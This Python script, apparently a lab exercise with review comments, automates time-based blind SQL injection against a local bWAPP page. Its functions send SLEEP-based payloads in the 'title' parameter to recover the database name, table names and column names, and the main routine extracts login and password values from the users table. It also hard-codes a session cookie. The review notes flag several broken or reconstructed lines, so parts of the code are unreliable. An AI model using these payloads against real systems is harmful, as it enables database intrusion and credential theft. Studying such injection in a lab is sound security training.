"""Time-based blind SQL injection walkthrough against the local bWAPP lab page.

Every helper below follows the same pattern: build a GET URL whose ``title``
parameter carries a boolean condition followed by ``SLEEP(2)``, time the
request, and treat a response slower than 2 s as "condition true".  Results
are mostly printed rather than returned.  From the server side each helper is
visible as a long series of GETs to the same path that differ only in one or
two integers of the query string.
"""
import requests
import time
import yaml

# Session cookie for the lab app, hard-coded in source.
# NOTE(review): a live session id committed to a script is a credential in
# version control even for a lab; read it from the environment or the YAML
# config instead.
HEADER={ "cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0" }
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# Read the test.yaml file
# NOTE(review): yaml.load() without an explicit Loader can construct arbitrary
# Python objects from the file on old PyYAML, emits a warning on 5.x, and is a
# TypeError on PyYAML 6 (Loader became required).  yaml.safe_load(file) is the
# safe form.  The file is also opened without an explicit encoding.
with open(config_path, "r") as file:
    data = yaml.load(file.read())
# Condition fragment taken from the config; it is string-concatenated into the
# URL in get_table_count() below, so it is expected to be a str.
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)


def get_database_name_length(a: str, b: str) -> int:
    """Probe candidate lengths 1..99 using a caller-supplied URL template.

    Args:
        a: base URL; a trailing ``?`` is appended when it is missing.
        b: query-string template with one ``{}`` placeholder that receives the
           candidate length (the commented example line shows the shape).

    Returns:
        The first candidate whose GET took longer than 2 s, or 0 if none did.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    if a[-1]!="?":
        a=a+"?"
    for i in range(1,100):
        url=a+b.format(i)
        start_time = time.time()
        # Each probe URL is echoed before it is sent.
        print(url)
        requests.get(url,headers=HEADER)
        # Timing oracle: a slow response means the injected condition held.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count


# Blind-infer the database name length
def get_database_name()->int:
    """Return the database name length (1..99) found via the timing oracle.

    Returns 0 when no probe exceeded the 2 s threshold.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count


# Blind-infer the database name
def get_database_table(count: int) -> None:
    """Recover the database name one character at a time and print it.

    Args:
        count: number of characters to recover (positions 1..count); each
               position is tested against printable ASCII codes 33..126.

    NOTE(review): ``"...".chr(m)`` on the hit branch is not a str method, so
    the first match raises AttributeError before the name is printed.
    """
    #mmp=get_database_name()
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                print("盲注数据库名长度为{}".chr(m))
                break
    print("打印数据库名称"+x)


# Number of tables in the current database
def get_table_count()->int:
    """Probe 1..99 with the condition fragment from the config (student1).

    NOTE(review): a second ``get_table_count`` is defined later in this file;
    at import time that definition replaces this one, so callers reach the
    users-column version.  ``count`` is only assigned on a hit, so a run with no
    slow response raises UnboundLocalError at the return.
    """
    for i in range(1,100):
        # .format binds to the "={}" literal only; student1 is concatenated raw.
        url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
        start_time=time.time()
        requests.get(url,headers=HEADER)
        if time.time()-start_time>2:
            count =i
            print("打印当前数据库下面表数量{}"+str(count))
            break
    return count


# Length of each table name
def get_table_counts(counts: int) -> int:
    """For table offsets 0..counts, find each name length, then fetch the name.

    On a hit the length is printed and get_database_tabless(i, m) is called.

    Returns:
        The value of ``m`` left after the loops (the last probed length), not a
        per-table result.
    """
    for i in range(counts + 1):
        for m in range(1,100):
            # NOTE(review): the string continuation here was reconstructed from a
            # garbled paste (the literal was split across a line break) — confirm
            # against the original file.
            url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables " \
                "where table_schema=database() limit {},1)={}" \
                " and sleep(2) -- &action=search".format(i,m)
            start_time=time.time()
            requests.get(url,headers=HEADER)
            if time.time()-start_time>2:
                print("打印当前表名长度{}".format(m))
                get_database_tabless(i, m)
                break
    return m


# Names of all tables in the database
def get_database_tabless(index: int, count: int) -> str:
    """Recover the name of the table at offset ``index`` and print it.

    Args:
        index: table offset used in the ``limit`` clause.
        count: name length; positions 1..count are tested.

    Returns:
        Always ``""``: ``x`` is reset before the return, so the recovered name
        is only available through the print.
    """
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                "ascii(substr((select table_name from information_schema.tables " \
                "where table_schema=database() limit {},1),{},1))={}" \
                " and sleep(2) -- &action=search".format(index,i,m)
            # The inner select picks one table name (by limit offset); substr(...,i,1)
            # then tests character i of that name.
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                break
    # "{}" is concatenated, not formatted, so it is printed literally.
    print("打印数据库名称{}" + x)
    x=""
    return x


# Based on the printed result: total number of columns in the users table
def get_table_count()->int:
    """Return the users-table column count (1..99) found via the timing oracle.

    Returns 0 when no probe exceeded the 2 s threshold.  This definition
    shadows the earlier ``get_table_count`` above.
    """
    count=0
    #select count(column_name) from information_schema.columns where table_name='users'  counts how many columns the users table has
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
            "AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库中users表列数量为:{}".format(i))
            count = i
            return count
    return count


# Lengths of the column names in the users table
def get_table_nameNumber(count: int) -> None:
    """For column offsets 0..count, find each name length (0..99).

    On a hit get_column_name_of(i, j) is called before the length is printed.
    """
    for i in range(count+1):
        for j in range(100):
            url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
                "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                get_column_name_of(i,j)
                print("user表,字段长度为{}".format(j))
                break


# Name of each column
def get_column_name_of(index: int, count: int) -> None:
    """Print, one character per line, the column name at offset ``index``.

    Args:
        index: column offset (first format argument).
        count: name length; positions 0..count are tested.
    """
    for i in range(count+1):
        for j in range(33,127):
            # NOTE(review): the last two literals were reconstructed from a garbled
            # paste (the string was split across a line break) — confirm against
            # the original file.
            url=BASE_URL+"?title=Iron Man' AND " \
                "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
                "AND SLEEP(2) -- " \
                "&action=search".format(index,i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print(chr(j))
                break


# Username and password from the wanted columns
def get_username_password() -> None:
    """Recover positions 0..99 of the first users row and print the result.

    The recovered text is printed once after the loops and then discarded;
    nothing is returned.
    """
    values=""
    for i in range(100):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
                "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                values=values+chr(j)
                break
    print(values)
    values=""


# Note: blind injection usually uses AND


if __name__=='__main__':
    #get_table_counts(get_table_count())
    #get_database_table(get_database_name())
    #get_table_counts(get_table_count())
    #get_table_count()
    #get_table_count()  # print the total column count of the users table
    get_username_password()  # print the wanted output

# userAgent: the browser access requirement; it gets past the simplest checks;
# a single quote is the SQL-injection test.